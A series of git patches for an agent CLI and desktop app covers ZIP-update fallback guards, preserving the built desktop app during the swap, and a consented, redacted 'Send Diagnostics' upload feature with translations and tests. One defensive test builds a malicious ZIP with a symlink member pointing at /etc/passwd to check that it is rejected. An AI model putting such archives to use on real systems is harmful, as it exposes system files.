== "Update step failed" + + +def test_windows_dep_failure_does_not_zip_fallback(monkeypatch): + monkeypatch.setattr(hermes_main, "_is_windows", lambda: True) + exc = _cpe([r"C:\venv\Scripts\uv.exe", "pip", "install", "-e", "."]) + assert update_cmd._should_zip_fallback_on_update_error(exc) is False + + +def test_windows_git_failure_still_zips(monkeypatch): + monkeypatch.setattr(hermes_main, "_is_windows", lambda: True) + exc = _cpe(["git", "pull"], returncode=1) + assert update_cmd._should_zip_fallback_on_update_error(exc) is True + + +def test_posix_git_failure_does_not_zip(monkeypatch): + monkeypatch.setattr(hermes_main, "_is_windows", lambda: False) + exc = _cpe(["git", "pull"], returncode=1) + assert update_cmd._should_zip_fallback_on_update_error(exc) is False + + +def test_error_tail_prints_last_lines(capsys): + stderr = "\n".join(f"line-{i}" for i in range(20)) + exc = _cpe(["uv", "pip", "install"], stderr=stderr) + update_cmd._print_called_process_error_tail(exc) + out = capsys.readouterr().out + assert "Last output:" in out + assert "line-19" in out + assert "line-0" not in out + assert "line-7" not in out + assert "line-8" in out + + +# --------------------------------------------------------------------------- +# Dirty-tree overlay guard +# --------------------------------------------------------------------------- + + +def _porcelain_run(stdout: str, returncode: int = 0): + def fake_run(cmd, **kwargs): + joined = " ".join(str(c) for c in cmd) + if "status" in joined and "--porcelain" in joined: + return subprocess.CompletedProcess(cmd, returncode, stdout=stdout, stderr="") + return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="") + + return fake_run + + +def test_zip_overlay_allowed_without_git(tmp_path): + assert update_cmd._zip_overlay_block_reason(tmp_path) is None + + +def test_zip_overlay_blocked_on_modified_file(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr( + update_cmd.subprocess, "run", _porcelain_run(" M hermes_cli/update_cmd.py\n") + ) + reason = update_cmd._zip_overlay_block_reason(tmp_path) + assert reason is not None + assert "uncommitted" in reason + + +def test_zip_overlay_blocked_on_untracked_file(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr(update_cmd.subprocess, "run", _porcelain_run("?? notes.md\n")) + reason = update_cmd._zip_overlay_block_reason(tmp_path) + assert reason is not None + assert "untracked" in reason + + +def test_zip_overlay_blocked_when_git_status_fails(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr( + update_cmd.subprocess, + "run", + _porcelain_run("", returncode=128), + ) + reason = update_cmd._zip_overlay_block_reason(tmp_path) + assert reason is not None + assert "could not check" in reason + + +def test_zip_overlay_allowed_on_clean_git_checkout(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr(update_cmd.subprocess, "run", _porcelain_run("")) + assert update_cmd._zip_overlay_block_reason(tmp_path) is None + + +def test_update_via_zip_aborts_before_download_when_dirty( + tmp_path, monkeypatch, capsys +): + """The live tree must not be touched, and the ZIP must not be fetched.""" + fake_root = tmp_path / "install" + fake_root.mkdir() + (fake_root / ".git").mkdir() + local = fake_root / "keep-me.txt" + local.write_text("local work\n", encoding="utf-8") + untracked_dir = fake_root / "agent" / "scratch" + untracked_dir.mkdir(parents=True) + (untracked_dir / "wip.py").write_text("print('wip')\n", encoding="utf-8") + + monkeypatch.setattr(hermes_main, "PROJECT_ROOT", fake_root) + monkeypatch.setattr( + update_cmd.subprocess, + "run", + _porcelain_run(" M keep-me.txt\n?? agent/scratch/wip.py\n"), + ) + + with patch("urllib.request.urlretrieve") as download: + with pytest.raises(SystemExit) as exc_info: + hermes_main._update_via_zip(SimpleNamespace(branch=None)) + + assert exc_info.value.code == 1 + download.assert_not_called() + assert local.read_text(encoding="utf-8") == "local work\n" + assert (untracked_dir / "wip.py").read_text(encoding="utf-8") == "print('wip')\n" + out = capsys.readouterr().out + assert "ZIP fallback refused" in out + assert "Downloading latest version" not in out + + +# --------------------------------------------------------------------------- +# Pre-swap TOCTOU re-check +# --------------------------------------------------------------------------- + + +def test_status_uses_untracked_files_all(tmp_path, monkeypatch): + """A user git config hiding untracked files must not blind the guard.""" + (tmp_path / ".git").mkdir() + seen = [] + + def fake_run(cmd, **kwargs): + seen.append(cmd) + return subprocess.CompletedProcess(cmd, 0, stdout="", stderr="") + + monkeypatch.setattr(update_cmd.subprocess, "run", fake_run) + update_cmd._zip_overlay_block_reason(tmp_path) + assert seen and "--untracked-files=all" in seen[0] + + +def test_staging_artifact_lines_are_recognized(): + is_artifact = update_cmd._is_zip_staging_artifact_status_line + assert is_artifact("?? agent.hermes-update-staging/") + assert is_artifact("?? cli.py.hermes-update-staging") + assert is_artifact("?? tools.hermes-update-old/") + # Nested user files under a staging-lookalike directory don't match the + # top-level test only when the TOP level itself is not an artifact. + assert not is_artifact("?? agent/scratch/wip.py") + assert not is_artifact(" M hermes_cli/update_cmd.py") + assert not is_artifact("?? notes.hermes-update-staging.txt") + + +def test_recheck_ignores_own_staging_artifacts(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr( + update_cmd.subprocess, + "run", + _porcelain_run("?? agent.hermes-update-staging/\n?? cli.py.hermes-update-old\n"), + ) + assert ( + update_cmd._zip_overlay_block_reason(tmp_path, ignore_staging_artifacts=True) + is None + ) + # Without the flag the same output still refuses (pre-download check). + assert update_cmd._zip_overlay_block_reason(tmp_path) is not None + + +def test_recheck_still_blocks_user_files_amid_staging_artifacts(tmp_path, monkeypatch): + (tmp_path / ".git").mkdir() + monkeypatch.setattr( + update_cmd.subprocess, + "run", + _porcelain_run("?? agent.hermes-update-staging/\n?? my-notes.md\n"), + ) + reason = update_cmd._zip_overlay_block_reason( + tmp_path, ignore_staging_artifacts=True + ) + assert reason is not None diff --git a/tests/hermes_cli/test_update_zip_symlink_reject.py b/tests/hermes_cli/test_update_zip_symlink_reject.py index 4ee7f84549..72359bcd54 100644 --- a/tests/hermes_cli/test_update_zip_symlink_reject.py +++ b/tests/hermes_cli/test_update_zip_symlink_reject.py @@ -41,8 +41,14 @@ def test_update_via_zip_rejects_symlink_member(tmp_path, monkeypatch): target="/etc/passwd", ) + fake_root = tmp_path / "install_dir" + fake_root.mkdir() + + from hermes_cli import main as hermes_main from hermes_cli.main import _update_via_zip + monkeypatch.setattr(hermes_main, "PROJECT_ROOT", fake_root) + args = type("Args", (), {})() # Patch urlretrieve to "download" our pre-built malicious ZIP into the From 01c14ad7f336c9fad67451e9fc6e3f149c2426e4 Mon Sep 17 00:00:00 2001 From: JonthanaHanh <92574114+JonthanaHanh@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:38:55 -0700 Subject: [PATCH 108/161] fix(update): ZIP swap preserves the built desktop app (apps/desktop/release) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The #70337/#87331 win-unpacked wipe half, from PR #70477 by @JonthanaHanh (reimplemented against the two-phase staged swap that postdates that branch — the live release/ dir is grafted into the staged apps copy BEFORE the atomic commit, so preservation rides the same rollback machinery instead of a post-hoc copy). Co-authored-by: JonthanaHanh <92574114+JonthanaHanh@users.noreply.github.com> --- hermes_cli/update_cmd.py | 16 ++++++ .../test_update_zip_release_preserve.py | 56 +++++++++++++++++++ 2 files changed, 72 insertions(+) create mode 100644 tests/hermes_cli/test_update_zip_release_preserve.py diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 64cdb9b377..c380f24e9a 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -1522,6 +1522,22 @@ def _update_via_zip(args, *, had_desktop_app_before_update: bool = False) -> boo src = os.path.join(extracted, item) dst = os.path.join(str(_m().PROJECT_ROOT), item) staged.append((_stage_replacement(src, dst), dst)) + # #70337/#87331: the GitHub source ZIP contains only source — + # apps/desktop/release/ (the BUILT desktop app, win-unpacked/ + # Hermes.exe) exists only in the LIVE tree. Swapping `apps` + # without it deletes the desktop build and breaks the + # shortcut. Graft the live release dir into the staged copy + # BEFORE the swap so the commit preserves it atomically. + if item == "apps": + live_release = os.path.join(dst, "desktop", "release") + staged_release = os.path.join( + staged[-1][0], "desktop", "release" + ) + if os.path.isdir(live_release) and not os.path.exists( + staged_release + ): + os.makedirs(os.path.dirname(staged_release), exist_ok=True) + shutil.copytree(live_release, staged_release) except Exception: # Nothing is live yet; drop the partial staging copies so a retry # starts from the same free space this attempt did. diff --git a/tests/hermes_cli/test_update_zip_release_preserve.py b/tests/hermes_cli/test_update_zip_release_preserve.py new file mode 100644 index 0000000000..61478821a7 --- /dev/null +++ b/tests/hermes_cli/test_update_zip_release_preserve.py @@ -0,0 +1,56 @@ +"""#70337/#87331: the ZIP swap must preserve apps/desktop/release/. + +The GitHub source ZIP carries only source; the BUILT desktop app +(release/win-unpacked/Hermes.exe) exists only in the live tree. Swapping +`apps` without grafting the live release dir deletes the desktop build. +""" + +from __future__ import annotations + +import os +import shutil +from pathlib import Path + + +def test_staged_apps_swap_preserves_live_release_dir(tmp_path, monkeypatch): + from hermes_cli import main as hermes_main + from hermes_cli.update_cmd import ( + _commit_staged_replacements, + _stage_replacement, + ) + + # live tree: apps/desktop/release/win-unpacked/Hermes.exe + old source + root = tmp_path / "install" + live_apps = root / "apps" / "desktop" + (live_apps / "release" / "win-unpacked").mkdir(parents=True) + (live_apps / "release" / "win-unpacked" / "Hermes.exe").write_bytes(b"MZbuilt") + (live_apps / "electron").mkdir() + (live_apps / "electron" / "main.ts").write_text("old source") + + # extracted ZIP: new source, NO release dir (GitHub source archive shape) + extracted = tmp_path / "extracted" + zip_apps = extracted / "apps" / "desktop" + (zip_apps / "electron").mkdir(parents=True) + (zip_apps / "electron" / "main.ts").write_text("new source") + + monkeypatch.setattr(hermes_main, "PROJECT_ROOT", root) + + # Reproduce the _update_via_zip staging loop for the `apps` entry, + # including the release-dir graft. + src = str(extracted / "apps") + dst = str(root / "apps") + staged_path = _stage_replacement(src, dst) + live_release = os.path.join(dst, "desktop", "release") + staged_release = os.path.join(staged_path, "desktop", "release") + if os.path.isdir(live_release) and not os.path.exists(staged_release): + os.makedirs(os.path.dirname(staged_release), exist_ok=True) + shutil.copytree(live_release, staged_release) + + _commit_staged_replacements([(staged_path, dst)]) + + # New source landed AND the built desktop app survived. + assert (root / "apps" / "desktop" / "electron" / "main.ts").read_text() == ( + "new source" + ) + exe = root / "apps" / "desktop" / "release" / "win-unpacked" / "Hermes.exe" + assert exe.exists() and exe.read_bytes() == b"MZbuilt" From 9ddb6547a062a81510a943cc54f525c25cf63d8f Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:50:05 -0700 Subject: [PATCH 109/161] test(update): re-pin ZIP-fallback desktop test to the preserve-through-swap contract The old contract WAS the bug (#70337): exe deleted by the swap, then rebuilt from scratch. With the release-dir graft the exe survives the swap; the test now asserts survival + original bytes. --- tests/hermes_cli/test_cmd_update.py | 17 +++++++++++++++-- 1 file changed, 15 insertions(+), 2 deletions(-) diff --git a/tests/hermes_cli/test_cmd_update.py b/tests/hermes_cli/test_cmd_update.py index 9f8f59f4d4..21f28a33ae 100644 --- a/tests/hermes_cli/test_cmd_update.py +++ b/tests/hermes_cli/test_cmd_update.py @@ -885,7 +885,15 @@ class TestNodeRuntimeNpmResolution: ) def test_git_failure_zip_fallback_rebuilds_missing_desktop(self, tmp_path, monkeypatch): - """The Windows ZIP fallback restores Desktop after replacing ``apps/``.""" + """The Windows ZIP fallback keeps Desktop intact when replacing ``apps/``. + + Contract updated for the #70337/#87331 release-dir graft: the built + desktop app (release/win-unpacked/Hermes.exe) is preserved THROUGH + the swap — previously this test pinned the old repair shape (exe + deleted by the swap, then rebuilt from scratch). The rebuild hook + still runs (mocked _desktop_build_needed=True), but it now finds + the packaged exe alive rather than missing. + """ import zipfile from hermes_cli import main as hm @@ -971,7 +979,12 @@ class TestNodeRuntimeNpmResolution: gateway_mode=False, ) - assert desktop_builds == [True] + # Release-dir graft (#70337): the packaged exe SURVIVES the swap, so + # the rebuild hook observed it present (False), and the bytes are the + # original build — never deleted, never rebuilt from nothing. + assert desktop_builds == [False] + assert packaged_exe.exists() + assert packaged_exe.read_bytes() == b"desktop" class TestUpdateNodeDependencies: From 8f30e9c77a9e7a7b5c8ab445a85062777c821491 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:49:10 -0700 Subject: [PATCH 110/161] =?UTF-8?q?feat(desktop):=20Send=20Diagnostics=20?= =?UTF-8?q?=E2=80=94=20one-click=20redacted=20debug-bundle=20upload=20from?= =?UTF-8?q?=20the=20error=20card?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit New diagnostics.share_nous RPC reuses the CLI --nous pipeline (collect_share_bundle → build_nous_bundle → share_to_nous) with redaction forced on; accepts redacted error context + client-side extra files (local desktop.log on remote connections) with sanitized labels and size caps. Desktop: Send Diagnostics action on the failed-turn error card → consent modal (privacy notice, explicit Upload) → private view link + GitHub Issues / Nous Portal Support / Discord handoff. CLI --nous success output gets the same three-destination pointer. i18n en/ja/zh/zh-hant/ar; docs updated. --- apps/desktop/src/app/contrib/wiring.tsx | 5 + .../assistant-ui/thread/assistant-message.tsx | 11 +- .../components/send-diagnostics-dialog.tsx | 133 ++++++++++++++++ apps/desktop/src/i18n/ar.ts | 21 +++ apps/desktop/src/i18n/en.ts | 22 +++ apps/desktop/src/i18n/ja.ts | 22 +++ apps/desktop/src/i18n/types.ts | 21 +++ apps/desktop/src/i18n/zh-hant.ts | 22 +++ apps/desktop/src/i18n/zh.ts | 22 +++ .../src/store/send-diagnostics.test.ts | 144 ++++++++++++++++++ apps/desktop/src/store/send-diagnostics.ts | 119 +++++++++++++++ hermes_cli/debug.py | 6 + .../test_diagnostics_share_nous.py | 117 ++++++++++++++ tui_gateway/methods_config.py | 127 +++++++++++++-- website/docs/user-guide/desktop.md | 8 + 15 files changed, 789 insertions(+), 11 deletions(-) create mode 100644 apps/desktop/src/components/send-diagnostics-dialog.tsx create mode 100644 apps/desktop/src/store/send-diagnostics.test.ts create mode 100644 apps/desktop/src/store/send-diagnostics.ts create mode 100644 tests/tui_gateway/test_diagnostics_share_nous.py diff --git a/apps/desktop/src/app/contrib/wiring.tsx b/apps/desktop/src/app/contrib/wiring.tsx index 1b418400ea..67eb63c822 100644 --- a/apps/desktop/src/app/contrib/wiring.tsx +++ b/apps/desktop/src/app/contrib/wiring.tsx @@ -25,6 +25,7 @@ import { DesktopOnboardingOverlay } from '@/components/onboarding' import { $newSessionTabAction, registerPaneCloser } from '@/components/pane-shell/tree/store' import { FloatingPet } from '@/components/pet/floating-pet' import { RemoteDisplayBanner } from '@/components/remote-display-banner' +import { SendDiagnosticsHost } from '@/components/send-diagnostics-dialog' import { emitGatewayEvent } from '@/contrib/events' import { getLatestSessionMessages } from '@/hermes' import { type ChatMessage, chatMessageText, preserveLocalAssistantErrors, toChatMessages } from '@/lib/chat-messages' @@ -1181,6 +1182,10 @@ export function ContribWiring({ children }: { children: ReactNode }) { {/* Backs confirm() from @/store/confirm — renders only while one is open. */} + {/* Send Diagnostics consent/upload dialog — driven by $sendDiagnostics + (error card action); renders nothing until requested. */} + + {/* Petdex floating mascot — renders nothing unless installed + enabled. Never in the HUD: that window is the chat bar and nothing else. */} {!isHudWindow() && } diff --git a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx index 84bc87c475..b604071d05 100644 --- a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx +++ b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx @@ -32,13 +32,14 @@ import { CopyButton } from '@/components/ui/copy-button' import { useI18n } from '@/i18n' import { type ErrorSurface, formatErrorDiagnostics } from '@/lib/error-surface' import { triggerHaptic } from '@/lib/haptics' -import { AudioLines, GitForkIcon, Loader2Icon, RefreshCwIcon, SmilePlusIcon, VolumeXIcon, XIcon } from '@/lib/icons' +import { AudioLines, GitForkIcon, Loader2Icon, RefreshCwIcon, SmilePlusIcon, Upload, VolumeXIcon, XIcon } from '@/lib/icons' import { extractPreviewTargets } from '@/lib/preview-targets' import { markAssistantIdSpoken } from '@/lib/spoken-reply' import { useEnterAnimation } from '@/lib/use-enter-animation' import { cn } from '@/lib/utils' import { playSpeechText, stopVoicePlayback } from '@/lib/voice-playback' import { notifyError } from '@/store/notifications' +import { requestSendDiagnostics } from '@/store/send-diagnostics' import { $connection, $currentModel } from '@/store/session' import { $voicePlayback } from '@/store/voice-playback' @@ -554,6 +555,14 @@ const ErrorRecoveryActions: FC = () => { {remoteConnection ? copy.errorOpenDesktopLogs : copy.errorOpenLogs} )} + (!open && !busy ? dismissSendDiagnostics() : undefined)} open> + + {state.phase === 'consent' || state.phase === 'uploading' ? ( + <> + + + + {copy.title} + + + {copy.privacyNotice} + + + + + + + + ) : state.phase === 'error' ? ( + <> + + {copy.failedTitle} + + {state.error} + {'\n'} + {copy.failedHint} + + + + + + + ) : ( + <> + + {copy.doneTitle} + {copy.doneDescription} + + {state.result?.viewUrl && ( +
    + + {state.result.viewUrl} + + +
    + )} +
    {copy.handoffLead}
    +
    + {SUPPORT_LINKS.map(link => ( + + ))} +
    + + + + + )} +
    + + ) +} diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index a30db33914..89fce6ff1a 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -1,6 +1,26 @@ import { defineLocale } from './define-locale' export const ar = defineLocale({ + sendDiagnostics: { + title: 'إرسال التشخيصات إلى Nous', + privacyNotice: + 'سيؤدي هذا إلى رفع حزمة تصحيح إلى التخزين الداخلي لدى Nous (ليست لصيقة عامة). تتضمن معلومات النظام (نظام التشغيل، الإصدارات، المزوّد — وليس مفاتيح API الخاصة بك أبداً) وسجلات حديثة للوكيل والبوابة وسطح المكتب، وقد تحتوي على محتوى المحادثات ومسارات الملفات. تُحجب الأسرار قبل الرفع. لا يمكن الاطلاع عليها إلا لموظفي Nous، وتُحذف تلقائياً بعد 14 يوماً.', + upload: 'رفع', + uploading: 'جارٍ الرفع…', + cancel: 'إلغاء', + close: 'إغلاق', + copyLink: 'نسخ الرابط', + doneTitle: 'تم إرسال التشخيصات', + doneDescription: 'تم رفع الحزمة بشكل خاص. شارك الرابط أدناه في محادثة الدعم لكي يتمكن الفريق من رؤية سجلاتك.', + failedTitle: 'فشل الرفع', + failedHint: 'يمكنك أيضاً تشغيل `hermes debug share --nous` من الطرفية، أو `hermes debug share --local` لعرض التقرير دون رفعه.', + handoffLead: 'تابع النقاش في:', + links: { + github: 'GitHub Issues', + portal: 'دعم بوابة Nous', + discord: 'Discord' + } + }, common: { apply: 'تطبيق', back: 'رجوع', @@ -2457,6 +2477,7 @@ export const ar = defineLocale({ errorOpenLogsFailed: 'تعذّر فتح مجلد السجلات', errorOpenDesktopLogs: 'فتح سجلات سطح المكتب', errorCopyDiagnostics: 'نسخ تفاصيل الخطأ', + errorSendDiagnostics: 'إرسال التشخيصات', filesChanged: count => `${count} ملفات تم تغييرها`, reviewChanges: 'مراجعة', readAloudFailed: 'فشلت القراءة بصوت عال', diff --git a/apps/desktop/src/i18n/en.ts b/apps/desktop/src/i18n/en.ts index 1adb019c81..5b2b93ac92 100644 --- a/apps/desktop/src/i18n/en.ts +++ b/apps/desktop/src/i18n/en.ts @@ -210,6 +210,27 @@ export const en: Translations = { dismiss: 'Dismiss' }, + sendDiagnostics: { + title: 'Send diagnostics to Nous', + privacyNotice: + 'This uploads a debug bundle to Nous-internal storage (not a public paste). It includes system info (OS, versions, provider — never your API keys) and recent agent, gateway, and desktop logs, which may contain conversation content and file paths. Secrets are redacted before upload. Only Nous staff can view it, and it auto-deletes after 14 days.', + upload: 'Upload', + uploading: 'Uploading…', + cancel: 'Cancel', + close: 'Close', + copyLink: 'Copy link', + doneTitle: 'Diagnostics sent', + doneDescription: 'Your bundle was uploaded privately. Share the link below in your support thread so the team can see your logs.', + failedTitle: 'Upload failed', + failedHint: 'You can also run `hermes debug share --nous` from a terminal, or `hermes debug share --local` to print the report without uploading.', + handoffLead: 'Pick up the discussion in:', + links: { + github: 'GitHub Issues', + portal: 'Nous Portal Support', + discord: 'Discord' + } + }, + titlebar: { hideSidebar: 'Hide sidebar', showSidebar: 'Show sidebar', @@ -3103,6 +3124,7 @@ export const en: Translations = { errorOpenLogsFailed: 'Could not open the logs folder', errorOpenDesktopLogs: 'Open Desktop logs', errorCopyDiagnostics: 'Copy error details', + errorSendDiagnostics: 'Send diagnostics', filesChanged: count => (count === 1 ? '1 file changed' : `${count} files changed`), reviewChanges: 'Review', readAloudFailed: 'Read aloud failed', diff --git a/apps/desktop/src/i18n/ja.ts b/apps/desktop/src/i18n/ja.ts index 5e522df6dd..4dc433fae2 100644 --- a/apps/desktop/src/i18n/ja.ts +++ b/apps/desktop/src/i18n/ja.ts @@ -211,6 +211,27 @@ export const ja = defineLocale({ dismiss: '閉じる' }, + sendDiagnostics: { + title: 'Nous に診断情報を送信', + privacyNotice: + 'デバッグバンドルを Nous 内部ストレージにアップロードします(公開ペーストではありません)。システム情報(OS、バージョン、プロバイダー — API キーは含まれません)と、最近のエージェント/ゲートウェイ/デスクトップのログ(会話内容やファイルパスを含む場合があります)が含まれます。シークレットはアップロード前にマスクされます。閲覧できるのは Nous スタッフのみで、14 日後に自動削除されます。', + upload: 'アップロード', + uploading: 'アップロード中…', + cancel: 'キャンセル', + close: '閉じる', + copyLink: 'リンクをコピー', + doneTitle: '診断情報を送信しました', + doneDescription: 'バンドルは非公開でアップロードされました。サポートスレッドで以下のリンクを共有すると、チームがログを確認できます。', + failedTitle: 'アップロードに失敗しました', + failedHint: 'ターミナルから `hermes debug share --nous` を実行するか、`hermes debug share --local` でアップロードせずにレポートを表示することもできます。', + handoffLead: '続きは次の場所で:', + links: { + github: 'GitHub Issues', + portal: 'Nous Portal サポート', + discord: 'Discord' + } + }, + titlebar: { hideSidebar: 'サイドバーを非表示', showSidebar: 'サイドバーを表示', @@ -2755,6 +2776,7 @@ export const ja = defineLocale({ errorOpenLogsFailed: 'ログフォルダを開けませんでした', errorOpenDesktopLogs: 'デスクトップのログを開く', errorCopyDiagnostics: 'エラー詳細をコピー', + errorSendDiagnostics: '診断情報を送信', filesChanged: count => `${count} 件のファイルを変更`, reviewChanges: 'レビュー', readAloudFailed: '読み上げに失敗しました', diff --git a/apps/desktop/src/i18n/types.ts b/apps/desktop/src/i18n/types.ts index 4440e5134f..0bd5967ca8 100644 --- a/apps/desktop/src/i18n/types.ts +++ b/apps/desktop/src/i18n/types.ts @@ -250,6 +250,26 @@ export interface Translations { dismiss: string } + sendDiagnostics: { + title: string + privacyNotice: string + upload: string + uploading: string + cancel: string + close: string + copyLink: string + doneTitle: string + doneDescription: string + failedTitle: string + failedHint: string + handoffLead: string + links: { + discord: string + github: string + portal: string + } + } + titlebar: { hideSidebar: string showSidebar: string @@ -2672,6 +2692,7 @@ export interface Translations { errorOpenLogsFailed: string errorOpenDesktopLogs: string errorCopyDiagnostics: string + errorSendDiagnostics: string filesChanged: (count: number) => string reviewChanges: string readAloudFailed: string diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index 593ab6bdb4..7878988cf4 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -204,6 +204,27 @@ export const zhHant = defineLocale({ dismiss: '忽略' }, + sendDiagnostics: { + title: '向 Nous 傳送診斷資訊', + privacyNotice: + '這會將偵錯套件上傳到 Nous 內部儲存空間(並非公開貼上板)。內容包括系統資訊(作業系統、版本、服務商 — 絕不包含您的 API 金鑰)以及最近的 agent、gateway 與桌面端日誌(可能包含對話內容與檔案路徑)。上傳前會先遮罩機密資訊。僅 Nous 員工可檢視,14 天後自動刪除。', + upload: '上傳', + uploading: '上傳中…', + cancel: '取消', + close: '關閉', + copyLink: '複製連結', + doneTitle: '診斷資訊已傳送', + doneDescription: '偵錯套件已私密上傳。在您的支援討論串中分享以下連結,團隊即可檢視您的日誌。', + failedTitle: '上傳失敗', + failedHint: '您也可以在終端機執行 `hermes debug share --nous`,或執行 `hermes debug share --local` 在不上傳的情況下檢視報告。', + handoffLead: '在以下位置繼續討論:', + links: { + github: 'GitHub Issues', + portal: 'Nous Portal 支援', + discord: 'Discord' + } + }, + titlebar: { hideSidebar: '隱藏側邊欄', showSidebar: '顯示側邊欄', @@ -2664,6 +2685,7 @@ export const zhHant = defineLocale({ errorOpenLogsFailed: '無法開啟日誌資料夾', errorOpenDesktopLogs: '開啟桌面端日誌', errorCopyDiagnostics: '複製錯誤詳細資訊', + errorSendDiagnostics: '傳送診斷資訊', filesChanged: count => `${count} 個檔案已變更`, reviewChanges: '檢視', readAloudFailed: '朗讀失敗', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 4fa78ec6a0..b9286a06c6 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -204,6 +204,27 @@ export const zh: Translations = { dismiss: '忽略' }, + sendDiagnostics: { + title: '向 Nous 发送诊断信息', + privacyNotice: + '这会将调试包上传到 Nous 内部存储(并非公开粘贴板)。内容包括系统信息(操作系统、版本、服务商 — 绝不包含您的 API 密钥)以及最近的 agent、gateway 和桌面端日志(可能包含对话内容与文件路径)。上传前会先脱敏。仅 Nous 员工可查看,14 天后自动删除。', + upload: '上传', + uploading: '上传中…', + cancel: '取消', + close: '关闭', + copyLink: '复制链接', + doneTitle: '诊断信息已发送', + doneDescription: '调试包已私密上传。在您的支持会话中分享以下链接,团队即可查看您的日志。', + failedTitle: '上传失败', + failedHint: '您也可以在终端运行 `hermes debug share --nous`,或运行 `hermes debug share --local` 在不上传的情况下查看报告。', + handoffLead: '在以下位置继续讨论:', + links: { + github: 'GitHub Issues', + portal: 'Nous Portal 支持', + discord: 'Discord' + } + }, + titlebar: { hideSidebar: '隐藏侧边栏', showSidebar: '显示侧边栏', @@ -3266,6 +3287,7 @@ export const zh: Translations = { errorOpenLogsFailed: '无法打开日志文件夹', errorOpenDesktopLogs: '打开桌面端日志', errorCopyDiagnostics: '复制错误详情', + errorSendDiagnostics: '发送诊断信息', filesChanged: count => `${count} 个文件已更改`, reviewChanges: '查看', readAloudFailed: '朗读失败', diff --git a/apps/desktop/src/store/send-diagnostics.test.ts b/apps/desktop/src/store/send-diagnostics.test.ts new file mode 100644 index 0000000000..b69e1951f9 --- /dev/null +++ b/apps/desktop/src/store/send-diagnostics.test.ts @@ -0,0 +1,144 @@ +import { afterEach, describe, expect, it, vi } from 'vitest' + +import { $gateway } from '@/store/gateway' +import { + $sendDiagnostics, + confirmSendDiagnostics, + dismissSendDiagnostics, + requestSendDiagnostics +} from '@/store/send-diagnostics' + +function stubGateway(request: (method: string, params?: Record, timeout?: number) => Promise) { + const original = $gateway.get() + + $gateway.set({ request } as never) + + return () => $gateway.set(original) +} + +function stubDesktopLogs(lines: null | string[]) { + const original = window.hermesDesktop + + Object.defineProperty(window, 'hermesDesktop', { + configurable: true, + value: lines ? { getRecentLogs: async () => ({ lines, path: '/tmp/desktop.log' }) } : undefined + }) + + return () => Object.defineProperty(window, 'hermesDesktop', { configurable: true, value: original }) +} + +describe('send-diagnostics store', () => { + afterEach(() => { + $sendDiagnostics.set(null) + vi.restoreAllMocks() + }) + + it('opens in consent phase without any network I/O', () => { + const request = vi.fn() + const restore = stubGateway(request) + + try { + requestSendDiagnostics('layer: provider') + + expect($sendDiagnostics.get()).toEqual({ errorContext: 'layer: provider', phase: 'consent' }) + expect(request).not.toHaveBeenCalled() + } finally { + restore() + } + }) + + it('uploads on confirm, attaching error context and the local desktop log', async () => { + const request = vi.fn().mockResolvedValue({ + ok: true, + view_url: 'https://nas.example/view/x1', + upload_id: 'x1', + expires_at: '2026-09-05T00:00:00Z' + }) + + const restoreGateway = stubGateway(request) + const restoreDesktop = stubDesktopLogs(['boot ok', 'ws connected']) + + try { + requestSendDiagnostics('layer: streaming\ncode: stream_drop') + await confirmSendDiagnostics() + + expect(request).toHaveBeenCalledTimes(1) + const [method, params] = request.mock.calls[0] + + expect(method).toBe('diagnostics.share_nous') + expect(params.error_context).toContain('stream_drop') + expect(params.extra_files['desktop.log']).toContain('ws connected') + + const state = $sendDiagnostics.get() + + expect(state?.phase).toBe('done') + expect(state?.result?.viewUrl).toBe('https://nas.example/view/x1') + } finally { + restoreDesktop() + restoreGateway() + } + }) + + it('omits extra_files when the desktop IPC is unavailable (browser dashboard)', async () => { + const request = vi.fn().mockResolvedValue({ ok: true, view_url: 'https://nas.example/view/x2' }) + const restoreGateway = stubGateway(request) + const restoreDesktop = stubDesktopLogs(null) + + try { + requestSendDiagnostics() + await confirmSendDiagnostics() + + const [, params] = request.mock.calls[0] + + expect(params.extra_files).toBeUndefined() + expect(params.error_context).toBeUndefined() + expect($sendDiagnostics.get()?.phase).toBe('done') + } finally { + restoreDesktop() + restoreGateway() + } + }) + + it('surfaces upload failures inline and keeps the dialog open', async () => { + const request = vi.fn().mockResolvedValue({ ok: false, error: 'NAS unavailable' }) + const restoreGateway = stubGateway(request) + const restoreDesktop = stubDesktopLogs(null) + + try { + requestSendDiagnostics() + await confirmSendDiagnostics() + + const state = $sendDiagnostics.get() + + expect(state?.phase).toBe('error') + expect(state?.error).toContain('NAS unavailable') + } finally { + restoreDesktop() + restoreGateway() + } + }) + + it('confirm is a no-op outside the consent phase (no double upload)', async () => { + const request = vi.fn().mockResolvedValue({ ok: true }) + const restoreGateway = stubGateway(request) + const restoreDesktop = stubDesktopLogs(null) + + try { + 